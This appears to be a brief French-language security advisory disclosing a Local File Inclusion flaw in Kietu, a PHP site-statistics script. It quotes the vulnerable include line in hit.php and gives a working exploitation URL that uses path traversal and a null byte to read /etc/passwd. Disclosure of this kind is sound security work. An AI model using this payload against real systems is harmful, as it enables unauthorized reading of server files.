Local File Inclusion : Kietu

[cdg393 () gmail com]

[::] Produit                 : Kietu

[::] Langage                 : PHP

[::] Description             : Kietu? est un script écrit en PHP, qui requiert une base de donnée mySQL, et qui vous 
permet de générer et consulter les statistiques d'accès à votre site web.

[::] Site web officiel       : http://www.Kietu.net/

[::] Page vulnérable         : hit.php

[::] Faille de sécurité      : Local File Inclusion

[::] Code vulnérable         : ( Ligne 2 ) -> include_once $url_hit.'class/kdetect.class.php';

[::] Exploitation            : http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00

@ [::] Crédit                  : Avis de sécurité par cdg393 -> cdg393_gmail_com :)